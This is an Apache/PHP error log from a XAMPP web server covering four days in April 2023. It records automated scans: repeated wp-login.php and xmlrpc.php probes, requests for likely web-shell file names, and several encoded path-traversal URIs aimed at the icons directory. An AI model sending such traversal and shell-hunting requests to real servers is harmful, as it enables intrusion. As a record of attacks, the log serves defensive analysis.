[Fri Apr 14 17:22:20.468976 2023] [php:error] [pid 11500:tid 3252] [client 217.234.78.169:44918] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.doma.fphosting.eu
[Fri Apr 14 17:42:27.305916 2023] [php:error] [pid 11500:tid 3252] [client 167.99.54.31:48520] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 17:57:07.590685 2023] [php:error] [pid 11500:tid 3252] [client 45.125.239.179:60712] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 18:14:19.262854 2023] [php:error] [pid 11500:tid 3008] [client 209.141.61.84:57910] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 18:40:58.705766 2023] [php:error] [pid 11500:tid 3252] [client 179.43.190.234:38128] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 19:06:04.668822 2023] [php:error] [pid 11500:tid 3148] [client 137.116.141.77:45632] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 20:14:00.987705 2023] [php:error] [pid 11500:tid 3252] [client 50.35.124.70:44030] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://tvar2.fpproduction.eu
[Fri Apr 14 20:51:23.286420 2023] [php:error] [pid 11500:tid 3008] [client 149.202.88.50:44608] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 20:56:48.787489 2023] [php:error] [pid 11500:tid 3008] [client 67.205.60.166:51312] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 22:31:06.825449 2023] [php:error] [pid 11500:tid 3148] [client 208.113.186.109:41564] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 22:43:52.592256 2023] [php:error] [pid 11500:tid 3252] [client 103.130.218.13:33402] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 22:54:03.705719 2023] [php:error] [pid 11500:tid 3256] [client 154.0.163.178:57648] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 23:27:11.936493 2023] [php:error] [pid 11500:tid 3256] [client 95.111.255.131:53742] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 23:40:45.398416 2023] [php:error] [pid 11500:tid 3496] [client 91.204.46.31:49750] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Apr 15 00:19:03.808767 2023] [php:error] [pid 11500:tid 3496] [client 144.76.57.230:46141] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Apr 15 00:30:49.938485 2023] [php:error] [pid 11500:tid 3256] [client 45.40.133.116:55596] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Apr 15 00:39:05.572305 2023] [php:error] [pid 11500:tid 3496] [client 64.227.30.80:58180] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://mta-sts.mail.fphosting.eu
[Sat Apr 15 00:39:05.948773 2023] [php:error] [pid 11500:tid 3496] [client 64.227.30.80:58242] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.mta-sts.mail.fphosting.eu
[Sat Apr 15 00:52:16.530294 2023] [php:error] [pid 11500:tid 3252] [client 45.76.223.150:41648] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Apr 15 00:57:55.429064 2023] [php:error] [pid 11500:tid 3252] [client 208.97.177.228:34496] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Apr 15 02:24:29.517996 2023] [php:error] [pid 11500:tid 3256] [client 43.134.130.106:57584] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Sat Apr 15 03:23:48.599161 2023] [php:error] [pid 11500:tid 3280] [client 95.211.87.209:42484] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Apr 15 06:49:41.832169 2023] [php:error] [pid 11500:tid 3008] [client 43.134.130.106:63513] script 'C:/xampp/htdocs/default/wso112233.php' not found or unable to stat
[Sat Apr 15 07:14:39.484050 2023] [php:error] [pid 11500:tid 3008] [client 206.81.18.4:20750] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://speedtest.fphosting.eu.prod.hosts.ooklaserver.net
[Sat Apr 15 07:31:02.631078 2023] [php:error] [pid 11500:tid 3008] [client 188.165.202.227:58257] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://cudlik.fphosting.eu
[Sat Apr 15 07:31:02.741119 2023] [php:error] [pid 11500:tid 3008] [client 188.165.202.227:58264] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.cudlik.fphosting.eu
[Sat Apr 15 07:51:12.034554 2023] [php:error] [pid 11500:tid 3280] [client 84.54.13.103:56798] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Apr 15 08:41:33.658066 2023] [php:error] [pid 11500:tid 3280] [client 66.249.73.109:65439] script 'C:/xampp/htdocs/default/c.php' not found or unable to stat
[Sat Apr 15 08:44:35.722673 2023] [php:error] [pid 11500:tid 3496] [client 50.35.124.70:47966] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://ucp.vn-rp.cz
[Sat Apr 15 09:31:54.808230 2023] [php:error] [pid 11500:tid 3496] [client 185.185.24.177:59168] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Apr 15 09:50:08.673282 2023] [php:error] [pid 11500:tid 3256] [client 193.34.145.203:57854] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Apr 15 09:53:15.127117 2023] [php:error] [pid 11500:tid 3256] [client 43.133.39.147:50922] script 'C:/xampp/htdocs/default/wso112233.php' not found or unable to stat
[Sat Apr 15 10:16:05.534284 2023] [php:error] [pid 11500:tid 3496] [client 50.35.124.70:59914] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://fphosting.eu
[Sat Apr 15 10:16:13.740522 2023] [php:error] [pid 11500:tid 3496] [client 50.35.124.70:60220] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.fphosting.eu
[Sat Apr 15 10:46:35.384192 2023] [php:error] [pid 11500:tid 3008] [client 159.203.34.66:60986] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Sat Apr 15 11:16:28.827817 2023] [php:error] [pid 11500:tid 3452] [client 141.95.92.59:51077] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Sat Apr 15 12:13:30.908457 2023] [php:error] [pid 11500:tid 3452] [client 134.122.7.10:46472] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://speedtest.fphosting.eu
[Sat Apr 15 12:13:31.601018 2023] [php:error] [pid 11500:tid 3452] [client 134.122.7.10:46598] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.speedtest.fphosting.eu
[Sat Apr 15 13:53:58.480523 2023] [php:error] [pid 11500:tid 3640] [client 139.59.31.218:46960] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://docs.vn-rp.cz
[Sat Apr 15 13:53:59.263914 2023] [php:error] [pid 11500:tid 3640] [client 139.59.31.218:47048] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.docs.vn-rp.cz
[Sat Apr 15 15:38:41.592348 2023] [php:error] [pid 11500:tid 3252] [client 103.82.20.185:65101] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Sat Apr 15 18:27:10.396951 2023] [php:error] [pid 11500:tid 3252] [client 212.227.149.137:40034] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Apr 15 18:36:54.387405 2023] [php:error] [pid 11500:tid 3008] [client 43.134.56.208:56568] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Sat Apr 15 19:11:07.890957 2023] [php:error] [pid 11500:tid 3160] [client 20.187.107.58:52918] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Sat Apr 15 19:28:41.227073 2023] [php:error] [pid 11500:tid 3256] [client 222.73.22.8:52921] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Apr 15 22:46:40.246444 2023] [php:error] [pid 11500:tid 3008] [client 66.249.75.174:42845] script 'C:/xampp/htdocs/default/666.php' not found or unable to stat
[Sun Apr 16 05:12:41.616113 2023] [authz_core:error] [pid 11500:tid 3296] [client 34.94.1.251:52076] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/scripts
[Sun Apr 16 06:37:11.698254 2023] [php:error] [pid 11500:tid 3160] [client 88.160.142.224:13527] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://lspd.vn-rp.cz
[Sun Apr 16 06:37:11.889226 2023] [php:error] [pid 11500:tid 3160] [client 88.160.142.224:15578] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.lspd.vn-rp.cz
[Sun Apr 16 08:44:24.925485 2023] [php:error] [pid 11500:tid 3252] [client 157.245.44.137:41642] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Sun Apr 16 09:32:53.369761 2023] [php:error] [pid 11500:tid 3296] [client 122.199.54.4:35232] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 10:04:35.320765 2023] [php:error] [pid 11500:tid 3256] [client 91.204.46.115:49452] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 11:02:22.248795 2023] [php:error] [pid 11500:tid 3496] [client 50.62.181.191:54988] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 11:17:39.317569 2023] [php:error] [pid 11500:tid 3256] [client 18.139.219.154:49086] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 11:32:04.412452 2023] [core:error] [pid 11500:tid 3160] [client 185.180.143.140:44216] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png)
[Sun Apr 16 11:32:04.470451 2023] [core:error] [pid 11500:tid 3160] [client 185.180.143.140:44316] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png)
[Sun Apr 16 11:32:04.526432 2023] [core:error] [pid 11500:tid 3160] [client 185.180.143.140:44364] AH10244: invalid URI path (/icons/.%2e/%2e%2e/apache2/icons/sphere1.png)
[Sun Apr 16 11:58:42.155692 2023] [php:error] [pid 11500:tid 3296] [client 103.130.218.158:50722] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 12:12:41.858250 2023] [php:error] [pid 11500:tid 3008] [client 209.141.37.166:56893] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 12:13:11.777163 2023] [php:error] [pid 11500:tid 3008] [client 164.90.156.86:52140] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 12:36:45.136800 2023] [php:error] [pid 11500:tid 3640] [client 23.97.205.210:49832] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://forum.fphosting.eu
[Sun Apr 16 12:36:45.347804 2023] [php:error] [pid 11500:tid 3640] [client 23.97.205.210:49886] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.forum.fphosting.eu
[Sun Apr 16 12:39:17.959885 2023] [php:error] [pid 11500:tid 3008] [client 137.135.122.19:51560] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 12:46:07.969878 2023] [php:error] [pid 11500:tid 3640] [client 62.138.7.116:55816] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 16:28:57.388272 2023] [php:error] [pid 11500:tid 3296] [client 194.113.235.171:44476] script 'C:/xampp/htdocs/default/777.php' not found or unable to stat, referer: http://fphosting.eu/777.php
[Sun Apr 16 16:28:58.470307 2023] [php:error] [pid 11500:tid 3296] [client 194.113.235.171:37854] script 'C:/xampp/htdocs/default/777.php' not found or unable to stat, referer: http://fpproduction.eu/777.php
[Sun Apr 16 17:23:09.587223 2023] [php:error] [pid 11500:tid 3296] [client 89.58.19.193:38812] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 17:28:16.531708 2023] [php:error] [pid 11500:tid 3296] [client 39.101.185.186:34304] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 19:00:44.941101 2023] [php:error] [pid 11500:tid 3252] [client 45.125.239.179:42990] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 19:16:33.010233 2023] [php:error] [pid 11500:tid 3252] [client 167.99.54.31:33964] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 19:20:23.267560 2023] [php:error] [pid 11500:tid 3252] [client 165.227.180.7:37820] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Sun Apr 16 20:01:21.696116 2023] [php:error] [pid 11500:tid 3256] [client 67.227.198.90:50340] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 20:09:14.956654 2023] [php:error] [pid 11500:tid 3256] [client 159.242.234.156:2298] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Sun Apr 16 20:27:03.377942 2023] [php:error] [pid 11500:tid 3296] [client 142.93.182.189:46042] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 20:56:05.049146 2023] [php:error] [pid 11500:tid 3296] [client 46.165.203.33:49856] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://emily.fphosting.eu
[Sun Apr 16 20:56:05.157828 2023] [php:error] [pid 11500:tid 3296] [client 46.165.203.33:49864] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.emily.fphosting.eu
[Sun Apr 16 21:22:34.552045 2023] [php:error] [pid 11500:tid 3452] [client 51.222.97.96:56156] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://wiki.fpproduction.eu
[Sun Apr 16 21:22:35.024750 2023] [php:error] [pid 11500:tid 3452] [client 51.222.97.96:56170] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.wiki.fpproduction.eu
[Sun Apr 16 22:24:34.592024 2023] [php:error] [pid 11500:tid 3424] [client 103.11.153.184:59784] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 16 22:30:38.213421 2023] [php:error] [pid 11500:tid 3424] [client 88.135.68.74:41504] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 00:32:48.783791 2023] [php:error] [pid 11500:tid 3640] [client 103.139.75.87:14134] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 00:43:59.895350 2023] [php:error] [pid 11500:tid 3640] [client 103.11.153.184:57784] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 17:16:17.216702 2023] [php:error] [pid 11500:tid 3148] [client 38.242.226.79:42442] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 17:55:39.336563 2023] [php:error] [pid 11500:tid 3532] [client 152.104.9.12:55760] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 18:07:56.713938 2023] [php:error] [pid 11500:tid 3084] [client 5.188.210.227:54672] script 'C:/xampp/htdocs/default/echo.php' not found or unable to stat, referer: https://www.google.com/
[Mon Apr 17 18:25:57.221992 2023] [php:error] [pid 11500:tid 3288] [client 185.165.118.34:33642] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 18:44:26.286514 2023] [php:error] [pid 11500:tid 3148] [client 116.118.50.209:57876] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 19:05:19.125747 2023] [php:error] [pid 11500:tid 3148] [client 194.163.162.92:42900] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 20:13:51.039386 2023] [php:error] [pid 11500:tid 3084] [client 167.172.86.207:39664] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 20:43:59.075782 2023] [php:error] [pid 11500:tid 3148] [client 206.189.95.151:59539] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Mon Apr 17 20:52:35.991446 2023] [php:error] [pid 11500:tid 3084] [client 194.233.91.204:33964] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 21:06:23.601128 2023] [php:error] [pid 11500:tid 3084] [client 103.158.206.172:44378] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 21:11:49.038822 2023] [php:error] [pid 11500:tid 3288] [client 113.119.57.181:51870] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 21:19:08.484047 2023] [php:error] [pid 11500:tid 3288] [client 208.109.34.70:55464] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 21:19:21.449775 2023] [php:error] [pid 11500:tid 3288] [client 50.35.124.70:45462] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://ns4.fphosting.eu
[Mon Apr 17 21:20:33.778194 2023] [php:error] [pid 11500:tid 3288] [client 124.217.226.56:50532] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 21:28:42.796662 2023] [php:error] [pid 11500:tid 3084] [client 159.203.108.168:40546] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://server-32557.prod.hosts.ooklaserver.net
[Mon Apr 17 21:29:12.391282 2023] [php:error] [pid 11500:tid 3084] [client 152.104.9.12:54684] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 21:29:13.166075 2023] [php:error] [pid 11500:tid 3084] [client 92.204.184.3:45440] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 21:30:46.203229 2023] [php:error] [pid 11500:tid 3084] [client 111.90.150.28:38328] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 22:48:39.475005 2023] [php:error] [pid 11500:tid 3288] [client 119.23.105.36:38520] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://email.fphosting.eu
[Mon Apr 17 22:48:40.366576 2023] [php:error] [pid 11500:tid 3288] [client 119.23.105.36:38602] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.email.fphosting.eu
[Mon Apr 17 23:18:54.495370 2023] [php:error] [pid 11500:tid 3640] [client 46.165.203.33:57274] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://board.vn-rp.cz
[Mon Apr 17 23:18:54.601397 2023] [php:error] [pid 11500:tid 3640] [client 46.165.203.33:57288] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.board.vn-rp.cz
[Mon Apr 17 23:24:26.707632 2023] [php:error] [pid 11500:tid 3640] [client 113.119.57.181:35142] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 17 23:52:20.514110 2023] [php:error] [pid 11500:tid 3288] [client 159.89.172.158:35412] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 18 00:20:16.595295 2023] [php:error] [pid 11500:tid 3288] [client 35.225.94.95:32954] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 18 01:26:01.506418 2023] [php:error] [pid 11500:tid 3084] [client 203.124.41.171:45156] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 18 02:11:53.865864 2023] [php:error] [pid 11500:tid 3640] [client 67.222.131.158:59886] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 18 02:53:47.782785 2023] [php:error] [pid 11500:tid 3488] [client 93.183.131.53:54484] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 18 03:03:53.629244 2023] [php:error] [pid 11500:tid 3264] [client 43.156.176.196:50802] script 'C:/xampp/htdocs/default/frontend_dev.php' not found or unable to stat
[Tue Apr 18 03:04:03.192665 2023] [php:error] [pid 11500:tid 3264] [client 43.156.176.196:61344] script 'C:/xampp/htdocs/default/phpinfo.php' not found or unable to stat
[Tue Apr 18 03:04:05.022499 2023] [php:error] [pid 11500:tid 3264] [client 43.156.176.196:63795] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Tue Apr 18 03:45:36.702161 2023] [php:error] [pid 11500:tid 3288] [client 198.12.253.60:40954] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
